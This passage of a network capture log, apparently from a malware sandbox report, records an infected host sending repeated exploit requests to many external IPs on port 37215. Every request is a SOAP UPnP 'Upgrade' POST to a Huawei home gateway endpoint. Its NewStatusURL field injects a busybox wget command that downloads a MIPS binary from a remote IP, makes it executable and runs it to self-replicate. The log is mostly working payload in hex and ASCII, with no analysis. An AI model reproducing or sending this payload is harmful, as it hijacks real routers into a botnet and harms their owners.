                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  25192.168.2.1349884197.214.69.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652240992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  26192.168.2.133866241.247.124.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652286053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  27192.168.2.134488241.22.233.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652354956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  28192.168.2.1353760197.70.184.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652355909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  29192.168.2.1355650157.242.182.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652355909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  30192.168.2.135337841.86.141.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652378082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  31192.168.2.135454041.189.123.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652441025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  32192.168.2.1356316197.32.143.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652446032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  33192.168.2.1346840141.230.63.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652508974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  34192.168.2.1357496197.233.38.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652508974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 